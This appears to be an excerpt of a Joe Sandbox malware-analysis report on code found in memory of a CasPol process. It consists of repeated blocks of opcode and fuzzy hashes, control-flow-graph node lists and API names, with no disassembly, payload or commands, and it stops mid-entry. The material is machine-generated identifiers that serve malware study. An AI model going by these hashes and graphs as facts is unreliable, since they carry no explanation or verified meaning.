                                                                                                                            • Instruction ID: cfc6706ca60e9d225092ccbfb11d18048a5f5118b7b8475a2aff33d20373df98
                                                                                                                            • Opcode Fuzzy Hash: 4b20bc83f6c3b2a6363a030ac6e24f2d3e5887d0788325299cb9809543dc6ea5
                                                                                                                            • Instruction Fuzzy Hash: 4D02B974945328CFCB65EF60C8986CAB7B1FF59715F5085EAD80A66354CB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1808 1d51e56e-1d51e594 1965 1d51e594 call 2054a340 1808->1965 1966 1d51e594 call 2054a330 1808->1966 1967 1d51e594 call 2054aa50 1808->1967 1968 1d51e594 call 2054aa43 1808->1968 1969 1d51e594 call 2054aafd 1808->1969 1970 1d51e594 call 2054aee8 1808->1970 1812 1d51e59a-1d51e6e5 call 2054c7c0 1945 1d51e6e5 call 2054d8a7 1812->1945 1946 1d51e6e5 call 2054d848 1812->1946 1947 1d51e6e5 call 2054d749 1812->1947 1827 1d51e6eb-1d51e80e KiUserExceptionDispatcher 1948 1d51e80e call 2054e3f0 1827->1948 1949 1d51e80e call 2054e2f1 1827->1949 1839 1d51e814-1d51e855 1950 1d51e855 call 2054e3f0 1839->1950 1951 1d51e855 call 2054e2f1 1839->1951 1952 1d51e855 call 2054e722 1839->1952 1953 1d51e855 call 2054e7b8 1839->1953 1954 1d51e855 call 2054e74a 1839->1954 1842 1d51e85b-1d51e893 1955 1d51e893 call 2054e3f0 1842->1955 1956 1d51e893 call 2054ec10 1842->1956 1957 1d51e893 call 2054e2f1 1842->1957 1958 1d51e893 call 2054e722 1842->1958 1959 1d51e893 call 2054ec6f 1842->1959 1960 1d51e893 call 2054e7b8 1842->1960 1961 1d51e893 call 2054eb69 1842->1961 1962 1d51e893 call 2054e74a 1842->1962 1845 1d51e899-1d51e8da 1963 1d51e8da call 2054ecd0 1845->1963 1964 1d51e8da call 2054ed30 1845->1964 1848 1d51e8e0-1d51e95f 1971 1d51e95f call 2054efe7 1848->1971 1972 1d51e95f call 2054ef88 1848->1972 1973 1d51e95f call 2054ef29 1848->1973 1854 1d51e965-1d51e9a6 1974 1d51e9a6 call 2054f395 1854->1974 1975 1d51e9a6 call 2054f341 1854->1975 1976 1d51e9a6 call 2054f048 1854->1976 1977 1d51e9a6 call 2054f0a8 1854->1977 1857 1d51e9ac-1d51f18e 1941 1d51f194-1d51f1e5 1857->1941 1945->1827 1946->1827 1947->1827 1948->1839 1949->1839 1950->1842 1951->1842 1952->1842 1953->1842 1954->1842 1955->1845 1956->1845 1957->1845 1958->1845 1959->1845 1960->1845 1961->1845 1962->1845 1963->1848 1964->1848 1965->1812 1966->1812 1967->1812 1968->1812 1969->1812 1970->1812 1971->1854 1972->1854 1973->1854 1974->1857 1975->1857 1976->1857 1977->1857
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: a98fa008a5229de77d23a437315767b71514940ce80a0937e6f8bf594deef219
                                                                                                                            • Instruction ID: 5290f21b7c2e68b2d26538666ef654051224035133c421d261a8761fd6f1aefa
                                                                                                                            • Opcode Fuzzy Hash: a98fa008a5229de77d23a437315767b71514940ce80a0937e6f8bf594deef219
                                                                                                                            • Instruction Fuzzy Hash: FA02A874941328CFCB65EF60C8986CAB7B1FF59715F5085EAD80A66354CB32AE85CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1978 1d51e5b5-1d51e6e5 call 2054c7c0 2129 1d51e6e5 call 2054d8a7 1978->2129 2130 1d51e6e5 call 2054d848 1978->2130 2131 1d51e6e5 call 2054d749 1978->2131 1994 1d51e6eb-1d51e80e KiUserExceptionDispatcher 2132 1d51e80e call 2054e3f0 1994->2132 2133 1d51e80e call 2054e2f1 1994->2133 2006 1d51e814-1d51e855 2134 1d51e855 call 2054e3f0 2006->2134 2135 1d51e855 call 2054e2f1 2006->2135 2136 1d51e855 call 2054e722 2006->2136 2137 1d51e855 call 2054e7b8 2006->2137 2138 1d51e855 call 2054e74a 2006->2138 2009 1d51e85b-1d51e893 2111 1d51e893 call 2054e3f0 2009->2111 2112 1d51e893 call 2054ec10 2009->2112 2113 1d51e893 call 2054e2f1 2009->2113 2114 1d51e893 call 2054e722 2009->2114 2115 1d51e893 call 2054ec6f 2009->2115 2116 1d51e893 call 2054e7b8 2009->2116 2117 1d51e893 call 2054eb69 2009->2117 2118 1d51e893 call 2054e74a 2009->2118 2012 1d51e899-1d51e8da 2119 1d51e8da call 2054ecd0 2012->2119 2120 1d51e8da call 2054ed30 2012->2120 2015 1d51e8e0-1d51e95f 2121 1d51e95f call 2054efe7 2015->2121 2122 1d51e95f call 2054ef88 2015->2122 2123 1d51e95f call 2054ef29 2015->2123 2021 1d51e965-1d51e9a6 2124 1d51e9a6 call 2054f395 2021->2124 2125 1d51e9a6 call 2054f341 2021->2125 2126 1d51e9a6 call 2054f048 2021->2126 2127 1d51e9a6 call 2054f0a8 2021->2127 2024 1d51e9ac-1d51f18e 2108 1d51f194-1d51f1e5 2024->2108 2111->2012 2112->2012 2113->2012 2114->2012 2115->2012 2116->2012 2117->2012 2118->2012 2119->2015 2120->2015 2121->2021 2122->2021 2123->2021 2124->2024 2125->2024 2126->2024 2127->2024 2129->1994 2130->1994 2131->1994 2132->2006 2133->2006 2134->2009 2135->2009 2136->2009 2137->2009 2138->2009
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: d29bf338cb39b80da92d56125cef20235b1b275d6b4bbcf8fa1c5d0de264dabd
                                                                                                                            • Instruction ID: 8b7f5ca8f995ccfd76ba68e7af16f80f03d8cd863b2b15e24cdf4e29d1e00b99
                                                                                                                            • Opcode Fuzzy Hash: d29bf338cb39b80da92d56125cef20235b1b275d6b4bbcf8fa1c5d0de264dabd
                                                                                                                            • Instruction Fuzzy Hash: 09F1B974941328CFCB65EF70C89868AB772FF59715F5085EAD80A66354CB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2139 1d51e5f3-1d51e6e5 call 2054c7c0 2277 1d51e6e5 call 2054d8a7 2139->2277 2278 1d51e6e5 call 2054d848 2139->2278 2279 1d51e6e5 call 2054d749 2139->2279 2152 1d51e6eb-1d51e80e KiUserExceptionDispatcher 2280 1d51e80e call 2054e3f0 2152->2280 2281 1d51e80e call 2054e2f1 2152->2281 2164 1d51e814-1d51e855 2282 1d51e855 call 2054e3f0 2164->2282 2283 1d51e855 call 2054e2f1 2164->2283 2284 1d51e855 call 2054e722 2164->2284 2285 1d51e855 call 2054e7b8 2164->2285 2286 1d51e855 call 2054e74a 2164->2286 2167 1d51e85b-1d51e893 2287 1d51e893 call 2054e3f0 2167->2287 2288 1d51e893 call 2054ec10 2167->2288 2289 1d51e893 call 2054e2f1 2167->2289 2290 1d51e893 call 2054e722 2167->2290 2291 1d51e893 call 2054ec6f 2167->2291 2292 1d51e893 call 2054e7b8 2167->2292 2293 1d51e893 call 2054eb69 2167->2293 2294 1d51e893 call 2054e74a 2167->2294 2170 1d51e899-1d51e8da 2295 1d51e8da call 2054ecd0 2170->2295 2296 1d51e8da call 2054ed30 2170->2296 2173 1d51e8e0-1d51e95f 2269 1d51e95f call 2054efe7 2173->2269 2270 1d51e95f call 2054ef88 2173->2270 2271 1d51e95f call 2054ef29 2173->2271 2179 1d51e965-1d51e9a6 2272 1d51e9a6 call 2054f395 2179->2272 2273 1d51e9a6 call 2054f341 2179->2273 2274 1d51e9a6 call 2054f048 2179->2274 2275 1d51e9a6 call 2054f0a8 2179->2275 2182 1d51e9ac-1d51f18e 2266 1d51f194-1d51f1e5 2182->2266 2269->2179 2270->2179 2271->2179 2272->2182 2273->2182 2274->2182 2275->2182 2277->2152 2278->2152 2279->2152 2280->2164 2281->2164 2282->2167 2283->2167 2284->2167 2285->2167 2286->2167 2287->2170 2288->2170 2289->2170 2290->2170 2291->2170 2292->2170 2293->2170 2294->2170 2295->2173 2296->2173
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: a23a8c02de6a98764d8db5d0dcda0f5dd8dd21d65cea63b9bd820a8b987b8392
                                                                                                                            • Instruction ID: b00375cd6d3a997116749c6af22c8af14113e177a5dc6c89f3415f1b4b603d46
                                                                                                                            • Opcode Fuzzy Hash: a23a8c02de6a98764d8db5d0dcda0f5dd8dd21d65cea63b9bd820a8b987b8392
                                                                                                                            • Instruction Fuzzy Hash: 37F1B974941328CFCB65EF70C89868AB7B2FF59715F5085EAD80A66354CB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2297 1d51e631-1d51e6e5 call 2054c7c0 2425 1d51e6e5 call 2054d8a7 2297->2425 2426 1d51e6e5 call 2054d848 2297->2426 2427 1d51e6e5 call 2054d749 2297->2427 2307 1d51e6eb-1d51e80e KiUserExceptionDispatcher 2428 1d51e80e call 2054e3f0 2307->2428 2429 1d51e80e call 2054e2f1 2307->2429 2319 1d51e814-1d51e855 2430 1d51e855 call 2054e3f0 2319->2430 2431 1d51e855 call 2054e2f1 2319->2431 2432 1d51e855 call 2054e722 2319->2432 2433 1d51e855 call 2054e7b8 2319->2433 2434 1d51e855 call 2054e74a 2319->2434 2322 1d51e85b-1d51e893 2435 1d51e893 call 2054e3f0 2322->2435 2436 1d51e893 call 2054ec10 2322->2436 2437 1d51e893 call 2054e2f1 2322->2437 2438 1d51e893 call 2054e722 2322->2438 2439 1d51e893 call 2054ec6f 2322->2439 2440 1d51e893 call 2054e7b8 2322->2440 2441 1d51e893 call 2054eb69 2322->2441 2442 1d51e893 call 2054e74a 2322->2442 2325 1d51e899-1d51e8da 2443 1d51e8da call 2054ecd0 2325->2443 2444 1d51e8da call 2054ed30 2325->2444 2328 1d51e8e0-1d51e95f 2445 1d51e95f call 2054efe7 2328->2445 2446 1d51e95f call 2054ef88 2328->2446 2447 1d51e95f call 2054ef29 2328->2447 2334 1d51e965-1d51e9a6 2448 1d51e9a6 call 2054f395 2334->2448 2449 1d51e9a6 call 2054f341 2334->2449 2450 1d51e9a6 call 2054f048 2334->2450 2451 1d51e9a6 call 2054f0a8 2334->2451 2337 1d51e9ac-1d51f18e 2421 1d51f194-1d51f1e5 2337->2421 2425->2307 2426->2307 2427->2307 2428->2319 2429->2319 2430->2322 2431->2322 2432->2322 2433->2322 2434->2322 2435->2325 2436->2325 2437->2325 2438->2325 2439->2325 2440->2325 2441->2325 2442->2325 2443->2328 2444->2328 2445->2334 2446->2334 2447->2334 2448->2337 2449->2337 2450->2337 2451->2337
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: f72e6bf547024cc51fe3d2f39cad854bc13c7e1be95aedb0d38e7109c0990f7f
                                                                                                                            • Instruction ID: d541b093de83036eacefc5b379f738dee1598967de4704d474dc6372fe7b928f
                                                                                                                            • Opcode Fuzzy Hash: f72e6bf547024cc51fe3d2f39cad854bc13c7e1be95aedb0d38e7109c0990f7f
                                                                                                                            • Instruction Fuzzy Hash: EFF1B834941328CFCB65EF70C89868AB7B1FF59715F5085EAD80A66354CB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2452 1d51e678-1d51e6e5 2576 1d51e6e5 call 2054d8a7 2452->2576 2577 1d51e6e5 call 2054d848 2452->2577 2578 1d51e6e5 call 2054d749 2452->2578 2459 1d51e6eb-1d51e80e KiUserExceptionDispatcher 2579 1d51e80e call 2054e3f0 2459->2579 2580 1d51e80e call 2054e2f1 2459->2580 2471 1d51e814-1d51e855 2581 1d51e855 call 2054e3f0 2471->2581 2582 1d51e855 call 2054e2f1 2471->2582 2583 1d51e855 call 2054e722 2471->2583 2584 1d51e855 call 2054e7b8 2471->2584 2585 1d51e855 call 2054e74a 2471->2585 2474 1d51e85b-1d51e893 2586 1d51e893 call 2054e3f0 2474->2586 2587 1d51e893 call 2054ec10 2474->2587 2588 1d51e893 call 2054e2f1 2474->2588 2589 1d51e893 call 2054e722 2474->2589 2590 1d51e893 call 2054ec6f 2474->2590 2591 1d51e893 call 2054e7b8 2474->2591 2592 1d51e893 call 2054eb69 2474->2592 2593 1d51e893 call 2054e74a 2474->2593 2477 1d51e899-1d51e8da 2594 1d51e8da call 2054ecd0 2477->2594 2595 1d51e8da call 2054ed30 2477->2595 2480 1d51e8e0-1d51e95f 2596 1d51e95f call 2054efe7 2480->2596 2597 1d51e95f call 2054ef88 2480->2597 2598 1d51e95f call 2054ef29 2480->2598 2486 1d51e965-1d51e9a6 2599 1d51e9a6 call 2054f395 2486->2599 2600 1d51e9a6 call 2054f341 2486->2600 2601 1d51e9a6 call 2054f048 2486->2601 2602 1d51e9a6 call 2054f0a8 2486->2602 2489 1d51e9ac-1d51f18e 2573 1d51f194-1d51f1e5 2489->2573 2576->2459 2577->2459 2578->2459 2579->2471 2580->2471 2581->2474 2582->2474 2583->2474 2584->2474 2585->2474 2586->2477 2587->2477 2588->2477 2589->2477 2590->2477 2591->2477 2592->2477 2593->2477 2594->2480 2595->2480 2596->2486 2597->2486 2598->2486 2599->2489 2600->2489 2601->2489 2602->2489
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: adf9fbada4922de2b2987bddbe61811ab5b59e447321acda1b967bf9c8542c05
                                                                                                                            • Instruction ID: b4a343c25a1589f4be5e91070a7078e786e3f4443946d8435e2d680c58855b0f
                                                                                                                            • Opcode Fuzzy Hash: adf9fbada4922de2b2987bddbe61811ab5b59e447321acda1b967bf9c8542c05
                                                                                                                            • Instruction Fuzzy Hash: 3EF1B834941328CFCB65EF60C89868AB7B1FF59715F5045EAD80AA6354CB326E81CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2603 1d51e6bf-1d51e6e5 2731 1d51e6e5 call 2054d8a7 2603->2731 2732 1d51e6e5 call 2054d848 2603->2732 2733 1d51e6e5 call 2054d749 2603->2733 2607 1d51e6eb-1d51e80e KiUserExceptionDispatcher 2734 1d51e80e call 2054e3f0 2607->2734 2735 1d51e80e call 2054e2f1 2607->2735 2619 1d51e814-1d51e855 2736 1d51e855 call 2054e3f0 2619->2736 2737 1d51e855 call 2054e2f1 2619->2737 2738 1d51e855 call 2054e722 2619->2738 2739 1d51e855 call 2054e7b8 2619->2739 2740 1d51e855 call 2054e74a 2619->2740 2622 1d51e85b-1d51e893 2741 1d51e893 call 2054e3f0 2622->2741 2742 1d51e893 call 2054ec10 2622->2742 2743 1d51e893 call 2054e2f1 2622->2743 2744 1d51e893 call 2054e722 2622->2744 2745 1d51e893 call 2054ec6f 2622->2745 2746 1d51e893 call 2054e7b8 2622->2746 2747 1d51e893 call 2054eb69 2622->2747 2748 1d51e893 call 2054e74a 2622->2748 2625 1d51e899-1d51e8da 2749 1d51e8da call 2054ecd0 2625->2749 2750 1d51e8da call 2054ed30 2625->2750 2628 1d51e8e0-1d51e95f 2724 1d51e95f call 2054efe7 2628->2724 2725 1d51e95f call 2054ef88 2628->2725 2726 1d51e95f call 2054ef29 2628->2726 2634 1d51e965-1d51e9a6 2727 1d51e9a6 call 2054f395 2634->2727 2728 1d51e9a6 call 2054f341 2634->2728 2729 1d51e9a6 call 2054f048 2634->2729 2730 1d51e9a6 call 2054f0a8 2634->2730 2637 1d51e9ac-1d51f18e 2721 1d51f194-1d51f1e5 2637->2721 2724->2634 2725->2634 2726->2634 2727->2637 2728->2637 2729->2637 2730->2637 2731->2607 2732->2607 2733->2607 2734->2619 2735->2619 2736->2622 2737->2622 2738->2622 2739->2622 2740->2622 2741->2625 2742->2625 2743->2625 2744->2625 2745->2625 2746->2625 2747->2625 2748->2625 2749->2628 2750->2628
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: 23a8b8e4bf56f60860802b8331b958a3b8bc28b38fe70766d30bdcdab213d326
                                                                                                                            • Instruction ID: 1dcd086d2dd23fd129b2a4184cd8226be4bab146e166f7ae5a093a3a9ff190b3
                                                                                                                            • Opcode Fuzzy Hash: 23a8b8e4bf56f60860802b8331b958a3b8bc28b38fe70766d30bdcdab213d326
                                                                                                                            • Instruction Fuzzy Hash: 3CE1B834945328CFCB65EF70C89868AB7B1FF59715F5085EAD80AA6354CB326E85CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2751 1d51e706-1d51e80e KiUserExceptionDispatcher 2878 1d51e80e call 2054e3f0 2751->2878 2879 1d51e80e call 2054e2f1 2751->2879 2764 1d51e814-1d51e855 2880 1d51e855 call 2054e3f0 2764->2880 2881 1d51e855 call 2054e2f1 2764->2881 2882 1d51e855 call 2054e722 2764->2882 2883 1d51e855 call 2054e7b8 2764->2883 2884 1d51e855 call 2054e74a 2764->2884 2767 1d51e85b-1d51e893 2885 1d51e893 call 2054e3f0 2767->2885 2886 1d51e893 call 2054ec10 2767->2886 2887 1d51e893 call 2054e2f1 2767->2887 2888 1d51e893 call 2054e722 2767->2888 2889 1d51e893 call 2054ec6f 2767->2889 2890 1d51e893 call 2054e7b8 2767->2890 2891 1d51e893 call 2054eb69 2767->2891 2892 1d51e893 call 2054e74a 2767->2892 2770 1d51e899-1d51e8da 2869 1d51e8da call 2054ecd0 2770->2869 2870 1d51e8da call 2054ed30 2770->2870 2773 1d51e8e0-1d51e95f 2871 1d51e95f call 2054efe7 2773->2871 2872 1d51e95f call 2054ef88 2773->2872 2873 1d51e95f call 2054ef29 2773->2873 2779 1d51e965-1d51e9a6 2874 1d51e9a6 call 2054f395 2779->2874 2875 1d51e9a6 call 2054f341 2779->2875 2876 1d51e9a6 call 2054f048 2779->2876 2877 1d51e9a6 call 2054f0a8 2779->2877 2782 1d51e9ac-1d51f18e 2866 1d51f194-1d51f1e5 2782->2866 2869->2773 2870->2773 2871->2779 2872->2779 2873->2779 2874->2782 2875->2782 2876->2782 2877->2782 2878->2764 2879->2764 2880->2767 2881->2767 2882->2767 2883->2767 2884->2767 2885->2770 2886->2770 2887->2770 2888->2770 2889->2770 2890->2770 2891->2770 2892->2770
                                                                                                                            APIs
                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 1D51E72C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5727942968.000000001D510000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D510000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_1d510000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 6842923-0
                                                                                                                            • Opcode ID: b9339db9b8302d9b7af9e8d95e9a832828de2e38648e0e86696933f43b420f57
                                                                                                                            • Instruction ID: 0c5df6cb5cb3e7badfdd59afa04687c15b4fe5277af547c492b1b5404f38dfbf
                                                                                                                            • Opcode Fuzzy Hash: b9339db9b8302d9b7af9e8d95e9a832828de2e38648e0e86696933f43b420f57
                                                                                                                            • Instruction Fuzzy Hash: 0BE1B834945328CFCB65EF70C89868AB7B2FF59715F5045EAD80AA6354CB326E85CF02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5737856473.0000000020540000.00000040.00000800.00020000.00000000.sdmp, Offset: 20540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_20540000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: c18df0a7ecccf08006a206fe5d9a02b09847d08cf67caf70e4a949e8bdeb7ed2
                                                                                                                            • Instruction ID: ba3e642c60e59c6ee9d4e0fd94c4c576618e434b290765a115b5510a0ac6098c
                                                                                                                            • Opcode Fuzzy Hash: c18df0a7ecccf08006a206fe5d9a02b09847d08cf67caf70e4a949e8bdeb7ed2
                                                                                                                            • Instruction Fuzzy Hash: B781E430B083459FDB05DBB4C888B9E7BB6AF85200F1584B6E545DB392EB74DC09CB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5702835674.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_d90000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: TerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1852365436-0
                                                                                                                            • Opcode ID: 5bf8430db6a9e4749d77a4acbd2a018288b4689ea3aa513d95003572084d36ee
                                                                                                                            • Instruction ID: 249164314d10b9a80d05c627f8a2e3d88924e97b57f09573a8401f6b210da074
                                                                                                                            • Opcode Fuzzy Hash: 5bf8430db6a9e4749d77a4acbd2a018288b4689ea3aa513d95003572084d36ee
                                                                                                                            • Instruction Fuzzy Hash: F1310A70600306CFDB248A2DC5BC7B237E2BF52320F5986AAC8848B0E5C774C9C5CA62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 88844adf1b7f8d8b3d7205478d0df4663f3938ca4d3d09a454916bad25c0bc07
                                                                                                                            • Instruction ID: eedbfa536b86ba86bc4678a8aae7ebbbfa417495411067c4b17d191c33f9df94
                                                                                                                            • Opcode Fuzzy Hash: 88844adf1b7f8d8b3d7205478d0df4663f3938ca4d3d09a454916bad25c0bc07
                                                                                                                            • Instruction Fuzzy Hash: 3B725235A041188FEB64DFA0C850BDDB772EF89304F5580A9D21AAB794DF309D86DF92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e6ede0316d7525da067a1854479a9107d123097460fdf334abf2621d2a91f440
                                                                                                                            • Instruction ID: 1597adcc1cc34944a9e5ba89731111d2f7f16c58ef4a5a35e0d1e7ba198fe0ea
                                                                                                                            • Opcode Fuzzy Hash: e6ede0316d7525da067a1854479a9107d123097460fdf334abf2621d2a91f440
                                                                                                                            • Instruction Fuzzy Hash: E312D030B002158FCB14DFB8C9886AE7BF2EF8A318F154469E515DB392EB34DD458B92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 131b91fcfc30b3090088c7e9aebd5abd0c875d1c7fce9e9629bd18ec3a1e6575
                                                                                                                            • Instruction ID: f59220fb3ffcccd5b1950a2b1850162fd0e41aa6ba488f34dc0145bb2141defb
                                                                                                                            • Opcode Fuzzy Hash: 131b91fcfc30b3090088c7e9aebd5abd0c875d1c7fce9e9629bd18ec3a1e6575
                                                                                                                            • Instruction Fuzzy Hash: 1FE10731B042168FCB14DFA8C49466EBBB3EFCA358F198569D5159B3A1DB34DC01CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bef3fa66f26a2b590fb206f6ab5129d3d6b99b582efaa634487ca63d440de6f5
                                                                                                                            • Instruction ID: 53a4aa7574b3b0fd49a9f2e90ed4e36acb524ad62b8d63592542576b563b0670
                                                                                                                            • Opcode Fuzzy Hash: bef3fa66f26a2b590fb206f6ab5129d3d6b99b582efaa634487ca63d440de6f5
                                                                                                                            • Instruction Fuzzy Hash: 1AC16334F002158FDB54DFA8C49476EBBB2EF8A394F258429E916EB390DB749C41CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.5701289884.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_ca0000_CasPol.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a9b74bc5621e8ee7fd10d268c7391d6cde5442283e2063ae30a56b464c4be414
